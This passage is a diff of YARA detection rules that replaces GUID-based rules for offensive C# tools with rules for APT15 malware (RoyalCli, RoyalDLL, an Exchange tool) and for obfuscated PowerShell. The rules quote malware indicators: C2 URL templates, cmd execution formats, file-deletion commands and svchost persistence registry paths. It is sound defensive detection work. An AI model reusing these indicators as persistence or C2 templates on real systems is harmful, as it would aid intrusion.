+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L34-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8435a9f9fdf1e29010db3f3c1f55c19d616761b0585a232686ed377a6a252297"
+		logic_hash = "5d42f48d7d816c0b0ea05145e9dd43b1b2589f3131bf286e1b39c0efaf1c6fac"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
 
 	strings:
-		$typelibguid0lo = "4eee900e-adc5-46a7-8d7d-873fd6aea83e" ascii wide
-		$typelibguid0up = "4EEE900E-ADC5-46A7-8D7D-873FD6AEA83E" ascii wide
+		$x1 = "del c:\\windows\\temp\\r.exe /f /q" fullword ascii
+		$x2 = "%s\\r.exe" fullword ascii
+		$s1 = "rights.dll" fullword ascii
+		$s2 = "\"%s\">>\"%s\"\\s.txt" fullword ascii
+		$s3 = "Nwsapagent" fullword ascii
+		$s4 = "%s\\r.bat" fullword ascii
+		$s5 = "%s\\s.txt" fullword ascii
+		$s6 = "runexe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "RunInstallA" ) and pe.exports ( "RunUninstallA" ) ) or 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_IIS_Backdoor : FILE
+rule SIGNATURE_BASE_APT15_Malware_Mar18_BS2005 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "44264dd9-f8e9-5a60-847f-94378e07a327"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/WBGlIl/IIS_backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2123-L2139"
+		description = "Detects malware from APT 15 report by NCC Group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "700bbe14-d79e-5a35-aab3-31eacd5bd950"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L61-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fbf6c641c9cede86867a88b62d5287d918edd67ae9f7228b5243d050a6487345"
+		logic_hash = "306903da4ecc9f5bf670d8c49039dee0ce5500c185acaef74786a2c109a4734b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "750d9eecd533f89b8aa13aeab173a1cf813b021b6824bc30e60f5db6fa7b950b"
 
 	strings:
-		$typelibguid0lo = "3fda4aa9-6fc1-473f-9048-7edc058c4f65" ascii wide
-		$typelibguid0up = "3FDA4AA9-6FC1-473F-9048-7EDC058C4F65" ascii wide
-		$typelibguid1lo = "73ca4159-5d13-4a27-8965-d50c41ab203c" ascii wide
-		$typelibguid1up = "73CA4159-5D13-4A27-8965-D50C41AB203C" ascii wide
+		$x1 = "AAAAKQAASCMAABi+AABnhEBj8vep7VRoAEPRWLweGc0/eiDrXGajJXRxbXsTXAcZAABK4QAAPWwAACzWAAByrg==" fullword ascii
+		$x2 = "AAAAKQAASCMAABi+AABnhKv3kXJJousn5YzkjGF46eE3G8ZGse4B9uoqJo8Q2oF0AABK4QAAPWwAACzWAAByrg==" fullword ascii
+		$a1 = "http://%s/content.html?id=%s" fullword ascii
+		$a2 = "http://%s/main.php?ssid=%s" fullword ascii
+		$a3 = "http://%s/webmail.php?id=%s" fullword ascii
+		$a9 = "http://%s/error.html?tab=%s" fullword ascii
+		$s1 = "%s\\~tmp.txt" fullword ascii
+		$s2 = "%s /C %s >>\"%s\" 2>&1" fullword ascii
+		$s3 = "DisableFirstRunCustomize" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Shellgen : FILE
+rule SIGNATURE_BASE_APT15_Malware_Mar18_Msexchangetool : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "538a4f12-5020-5c76-9208-363f435ed9a9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/jasondrawdy/ShellGen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2141-L2155"
+		description = "Detects malware from APT 15 report by NCC Group"
+		author = "Florian Roth (Nextron Systems)"
+		id = "81b826b6-8c2e-5a8a-a626-9515d40dbbb0"
+		date = "2018-03-10"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/HZ5XMN"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L89-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ed7204d27cae6e0bcbe42247775e5eb20a968c5816f71135c7e2c92cc7fdffc5"
+		logic_hash = "4e9e29bc69383ab6248241622394afddde6e18032ed6e2b64575362773f25a94"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "16b868d1bef6be39f69b4e976595e7bd46b6c0595cf6bc482229dbb9e64f1bce"
 
 	strings:
-		$typelibguid0lo = "c6894882-d29d-4ae1-aeb7-7d0a9b915013" ascii wide
-		$typelibguid0up = "C6894882-D29D-4AE1-AEB7-7D0A9B915013" ascii wide
+		$s1 = "\\Release\\EWSTEW.pdb" ascii
+		$s2 = "EWSTEW.exe" fullword wide
+		$s3 = "Microsoft.Exchange.WebServices.Data" fullword ascii
+		$s4 = "tmp.dat" fullword wide
+		$s6 = "/v or /t is null" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Mass_RAT : FILE
+rule SIGNATURE_BASE_Clean_Apt15_Patchedcmd : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "90b742da-6fd7-5c72-96cf-7a37a3e5d808"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/Mass-RAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2157-L2175"
+		description = "This is a patched CMD. This is the CMD that RoyalCli uses."
+		author = "Ahmed Zaki"
+		id = "c6867ad4-f7f2-5d63-bffd-07599ede635d"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L118-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "540620ade0225df3fa207052c3904584672eb5bdccaa523e28a1a2aced604ef9"
+		hash = "90d1f65cfa51da07e040e066d4409dc8a48c1ab451542c894a623bc75c14bf8f"
+		logic_hash = "08a68e14793d2f44ee75e49a43521c7d8bc1fc5ddd005e1fb71cc844966e16ba"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "6c43a753-9565-48b2-a372-4210bb1e0d75" ascii wide
-		$typelibguid0up = "6C43A753-9565-48B2-A372-4210BB1E0D75" ascii wide
-		$typelibguid1lo = "92ba2a7e-c198-4d43-929e-1cfe54b64d95" ascii wide
-		$typelibguid1up = "92BA2A7E-C198-4D43-929E-1CFE54B64D95" ascii wide
-		$typelibguid2lo = "4cb9bbee-fb92-44fa-a427-b7245befc2f3" ascii wide
-		$typelibguid2up = "4CB9BBEE-FB92-44FA-A427-B7245BEFC2F3" ascii wide
+		$ = "eisableCMD" wide
+		$ = "%WINDOWS_COPYRIGHT%" wide
+		$ = "Cmd.Exe" wide
+		$ = "Windows Command Processor" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Browser_Externalc2 : FILE
+rule SIGNATURE_BASE_Malware_Apt15_Royalcli_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8c309522-90e7-5f5a-b456-3a472756d397"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/mdsecactivebreach/Browser-ExternalC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2177-L2191"
+		description = "Generic strings found in the Royal CLI tool"
+		author = "David Cannings"
+		id = "432c09bf-3c44-5a2c-ba69-7b4fe7eb43cc"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L133-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d5121396444c406049fcb6c24680a067341943a6982f67c7c5cd11947d3468bc"
+		hash = "6df9b712ff56009810c4000a0ad47e41b7a6183b69416251e060b5c80cd05785"
+		logic_hash = "3cc0cd81db58e20fbf31fbd9fe65d113b7160e7d2b6739c01987d9e317099b9b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "10a730cd-9517-42d5-b3e3-a2383515cca9" ascii wide
-		$typelibguid0up = "10A730CD-9517-42D5-B3E3-A2383515CCA9" ascii wide
+		$ = "%s~clitemp%08x.tmp" fullword
+		$ = "%s /c %s>%s" fullword
+		$ = "%snewcmd.exe" fullword
+		$ = "%shkcmd.exe" fullword
+		$ = "%s~clitemp%08x.ini" fullword
+		$ = "myRObject" fullword
+		$ = "myWObject" fullword
+		$ = "2 %s  %d 0 %d\x0D\x0A"
+		$ = "2 %s  %d 1 %d\x0D\x0A"
+		$ = "%s file not exist" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Offensivepowershelltasking : FILE
+rule SIGNATURE_BASE_Malware_Apt15_Royalcli_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d221e24d-a2ef-51e2-95bf-4b91b438d9cf"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/leechristensen/OffensivePowerShellTasking"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2193-L2209"
+		description = "APT15 RoyalCli backdoor"
+		author = "Nikolaos Pantazopoulos"
+		id = "d4acfd2d-385d-5063-898e-d339b50733eb"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L154-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6de43b8349ff5f0e87d91e522be802a5dd18745441ffb76dcef63d2f1cd25332"
+		logic_hash = "c57ae92ba84355652cd56c8eaad3f277a8f514f8d078f053f3e8208b8bec535f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "d432c332-3b48-4d06-bedb-462e264e6688" ascii wide
-		$typelibguid0up = "D432C332-3B48-4D06-BEDB-462E264E6688" ascii wide
-		$typelibguid1lo = "5796276f-1c7a-4d7b-a089-550a8c19d0e8" ascii wide
-		$typelibguid1up = "5796276F-1C7A-4D7B-A089-550A8C19D0E8" ascii wide
+		$string1 = "%shkcmd.exe" fullword
+		$string2 = "myRObject" fullword
+		$string3 = "%snewcmd.exe" fullword
+		$string4 = "%s~clitemp%08x.tmp" fullword
+		$string6 = "myWObject" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dohc2 : FILE
+rule SIGNATURE_BASE_Malware_Apt15_Royaldll
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0bb38f10-ca5c-5c18-97c9-540b6367d150"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/SpiderLabs/DoHC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2211-L2225"
+		description = "DLL implant, originally rights.dll and runs as a service"
+		author = "David Cannings"
+		id = "26baef92-1055-56dc-b274-e2a6bc05d85b"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L196-L243"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d94760229bd6df29f7e281ee9d38068699d6529b93ed90c8846635bd496d602a"
+		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
+		logic_hash = "2ed0d38993a072da189f02233bd7cc0bf1be02e926f687db224f52de9b3a44fc"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "9877a948-2142-4094-98de-e0fbb1bc4062" ascii wide
-		$typelibguid0up = "9877A948-2142-4094-98DE-E0FBB1BC4062" ascii wide
+		$opcodes_jshash = { B8 A7 C6 67 4E 83 C1 02 BA 04 00 00 00 57 90 }
+		$opcodes_encode = { 0F B6 1C 03 8B 55 08 30 1C 17 47 3B 7D 0C }
+		$opcodes_sleep_loop = { 68 (88|B8) (13|0B) 00 00 FF D6 4F 75 F6 }
+		$ = "Nwsapagent" fullword
+		$ = "\"%s\">>\"%s\"\\s.txt"
+		$ = "myWObject" fullword
+		$ = "del c:\\windows\\temp\\r.exe /f /q"
+		$ = "del c:\\windows\\temp\\r.ini /f /q"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Syscallpoc : FILE
+
+rule SIGNATURE_BASE_Malware_Apt15_Royaldll_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1ed5e226-0dcd-5397-b5e8-41f8a14981a1"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/SolomonSklash/SyscallPOC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2227-L2243"
+		description = "DNS backdoor used by APT15"
+		author = "Ahmed Zaki"
+		id = "3bc546a5-38b9-5504-b09e-305ba7bbd6bc"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L245-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "95f6c80e810c4f3b680958d8fe41983f965e47994ddc2f85756d570341b54bb9"
+		hash = "bc937f6e958b339f6925023bc2af375d669084e9551fd3753e501ef26e36b39d"
+		logic_hash = "94e2b61ff19b1377f461203cb22c607e718683691e54a3de3ed32bf6ed2897fa"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "1e54637b-c887-42a9-af6a-b4bd4e28cda9" ascii wide
-		$typelibguid0up = "1E54637B-C887-42A9-AF6A-B4BD4E28CDA9" ascii wide
-		$typelibguid1lo = "198d5599-d9fc-4a74-87f4-5077318232ad" ascii wide
-		$typelibguid1up = "198D5599-D9FC-4A74-87F4-5077318232AD" ascii wide
+		$ = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost" wide ascii
+		$ = "netsvcs" wide ascii fullword
+		$ = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" wide ascii fullword
+		$ = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
+		$ = "myWObject" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and all of them and pe.exports ( "ServiceMain" ) and filesize > 50KB and filesize < 600KB
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Pen_Test_Tools : FILE
+rule SIGNATURE_BASE_Malware_Apt15_Exchange_Tool : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "00fb98a9-e615-5fb6-a555-4326b93e2c24"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/awillard1/Pen-Test-Tools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2245-L2281"
+		description = "This is a an exchange enumeration/hijacking tool used by an APT 15"
+		author = "Ahmed Zaki"
+		id = "f07b9537-0741-51c8-a9fa-836430fe4855"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L263-L283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "413cef91cab63cec432cb8deb2876f0370f6fe8b5e194b513bc905aca755e732"
-		score = 50
-		quality = 83
+		hash = "d21a7e349e796064ce10f2f6ede31c71"
+		logic_hash = "e7b5ac97f3dcf125e64001be53aca73ee19c1be8b192a762f231106c47f76867"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "922e7fdc-33bf-48de-bc26-a81f85462115" ascii wide
-		$typelibguid0up = "922E7FDC-33BF-48DE-BC26-A81F85462115" ascii wide
-		$typelibguid1lo = "ad5205dd-174d-4332-96d9-98b076d6fd82" ascii wide
-		$typelibguid1up = "AD5205DD-174D-4332-96D9-98B076D6FD82" ascii wide
-		$typelibguid2lo = "b67e7550-f00e-48b3-ab9b-4332b1254a86" ascii wide
-		$typelibguid2up = "B67E7550-F00E-48B3-AB9B-4332B1254A86" ascii wide
-		$typelibguid3lo = "5e95120e-b002-4495-90a1-cd3aab2a24dd" ascii wide
-		$typelibguid3up = "5E95120E-B002-4495-90A1-CD3AAB2A24DD" ascii wide
-		$typelibguid4lo = "295017f2-dc31-4a87-863d-0b9956c2b55a" ascii wide
-		$typelibguid4up = "295017F2-DC31-4A87-863D-0B9956C2B55A" ascii wide
-		$typelibguid5lo = "abbaa2f7-1452-43a6-b98e-10b2c8c2ba46" ascii wide
-		$typelibguid5up = "ABBAA2F7-1452-43A6-B98E-10B2C8C2BA46" ascii wide
-		$typelibguid6lo = "a4043d4c-167b-4326-8be4-018089650382" ascii wide
-		$typelibguid6up = "A4043D4C-167B-4326-8BE4-018089650382" ascii wide
-		$typelibguid7lo = "51abfd75-b179-496e-86db-62ee2a8de90d" ascii wide
-		$typelibguid7up = "51ABFD75-B179-496E-86DB-62EE2A8DE90D" ascii wide
-		$typelibguid8lo = "a06da7f8-f87e-4065-81d8-abc33cb547f8" ascii wide
-		$typelibguid8up = "A06DA7F8-F87E-4065-81D8-ABC33CB547F8" ascii wide
-		$typelibguid9lo = "ee510712-0413-49a1-b08b-1f0b0b33d6ef" ascii wide
-		$typelibguid9up = "EE510712-0413-49A1-B08B-1F0B0B33D6EF" ascii wide
-		$typelibguid10lo = "9780da65-7e25-412e-9aa1-f77d828819d6" ascii wide
-		$typelibguid10up = "9780DA65-7E25-412E-9AA1-F77D828819D6" ascii wide
-		$typelibguid11lo = "7913fe95-3ad5-41f5-bf7f-e28f080724fe" ascii wide
-		$typelibguid11up = "7913FE95-3AD5-41F5-BF7F-E28F080724FE" ascii wide
+		$s1 = "subjectname" fullword
+		$s2 = "sendername" fullword
+		$s3 = "WebCredentials" fullword
+		$s4 = "ExchangeVersion" fullword
+		$s5 = "ExchangeCredentials" fullword
+		$s6 = "slfilename" fullword
+		$s7 = "EnumMail" fullword
+		$s8 = "EnumFolder" fullword
+		$s9 = "set_Credentials" fullword
+		$s18 = "/v or /t is null" wide
+		$s24 = "2013sp1" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_The_Collection : FILE
+rule SIGNATURE_BASE_Malware_Apt15_Generic
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4ae78576-ab75-5679-9a29-4d9a1ff03f15"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Tlgyt/The-Collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2283-L2305"
+		description = "Find generic data potentially relating to AP15 tools"
+		author = "David Cannings"
+		id = "4eb50731-22df-5f7a-bf5f-166ef84cf8b5"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt15.yar#L285-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2cceb8173d9cf3a429a07f2abd2e09970a1807258a315991495a1904f0f4af0"
+		logic_hash = "e939a5ab4a4b2b289d5809e18dd57dd85e3da19a176719adba4707dfd605fc81"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$typelibguid0lo = "579159ff-3a3d-46a7-b069-91204feb21cd" ascii wide
-		$typelibguid0up = "579159FF-3A3D-46A7-B069-91204FEB21CD" ascii wide
-		$typelibguid1lo = "5b7dd9be-c8c3-4c4f-a353-fefb89baa7b3" ascii wide
-		$typelibguid1up = "5B7DD9BE-C8C3-4C4F-A353-FEFB89BAA7B3" ascii wide
-		$typelibguid2lo = "43edcb1f-3098-4a23-a7f2-895d927bc661" ascii wide
-		$typelibguid2up = "43EDCB1F-3098-4A23-A7F2-895D927BC661" ascii wide
-		$typelibguid3lo = "5f19919d-cd51-4e77-973f-875678360a6f" ascii wide
-		$typelibguid3up = "5F19919D-CD51-4E77-973F-875678360A6F" ascii wide
-		$typelibguid4lo = "17fbc926-e17e-4034-ba1b-fb2eb57f5dd3" ascii wide
-		$typelibguid4up = "17FBC926-E17E-4034-BA1B-FB2EB57F5DD3" ascii wide
+		$str01 = "myWObject" fullword
+		$str02 = "myRObject" fullword
+		$opcodes01 = { 6A (02|03) 6A 00 6A 00 68 00 00 00 C0 50 FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Change_Lockscreen : FILE
+rule SIGNATURE_BASE_Powershell_Case_Anomaly : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a817c6e8-95f9-56c6-97b8-4be06658629f"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/nccgroup/Change-Lockscreen"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2307-L2321"
+		description = "Detects obfuscated PowerShell hacktools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "41c97d15-c167-5bdd-a8b4-871d14f66fe1"
+		date = "2017-08-11"
+		modified = "2022-06-12"
+		reference = "https://twitter.com/danielhbohannon/status/905096106924761088"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_case_anomalies.yar#L11-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "92ec9daecd17c8b0aa92f266b2cd81e0198a28d41e43d526bc94b9a2df23015b"
-		score = 75
-		quality = 85
+		logic_hash = "cbef94b899a2d22930ee0e8b3eac03c505db629d19a62ddd8f56482403dfa595"
+		score = 70
+		quality = 77
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "78642ab3-eaa6-4e9c-a934-e7b0638bc1cc" ascii wide
-		$typelibguid0up = "78642AB3-EAA6-4E9C-A934-E7B0638BC1CC" ascii wide
+		$s1 = "powershell" nocase ascii wide
+		$sn1 = "powershell" ascii wide
+		$sn2 = "Powershell" ascii wide
+		$sn3 = "PowerShell" ascii wide
+		$sn4 = "POWERSHELL" ascii wide
+		$sn5 = "powerShell" ascii wide
+		$sn6 = "PowerShelL" ascii wide
+		$sn7 = "PowershelL" ascii wide
+		$a1 = "wershell -e " nocase wide ascii
+		$an1 = "wershell -e " wide ascii
+		$an2 = "werShell -e " wide ascii
+		$k1 = "-noprofile" fullword nocase ascii wide
+		$kn1 = "-noprofile" ascii wide
+		$kn2 = "-NoProfile" ascii wide
+		$kn3 = "-noProfile" ascii wide
+		$kn4 = "-NOPROFILE" ascii wide
+		$kn5 = "-Noprofile" ascii wide
+		$fp1 = "Microsoft Code Signing" ascii fullword
+		$fp2 = "Microsoft Corporation" ascii
+		$fp3 = "Microsoft.Azure.Commands.ContainerInstance" wide
+		$fp4 = "# Localized PSGet.Resource.psd1" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 800KB and ( ( #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5 + #sn6 + #sn7 ) or ( #a1 > #an1 + #an2 ) or ( #k1 > #kn1 + #kn2 + #kn3 + #kn4 + #kn5 ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_LOLBITS : FILE
+rule SIGNATURE_BASE_Wscriptshell_Case_Anomaly : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "66454ac0-742b-51a3-ac45-1ac9606e8b89"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/Kudaes/LOLBITS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2323-L2337"
+		description = "Detects obfuscated wscript.shell commands"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d69d932d-1e39-5259-9200-f0227754f49c"
+		date = "2017-09-11"
+		modified = "2022-06-09"
+		reference = "Internal Research"
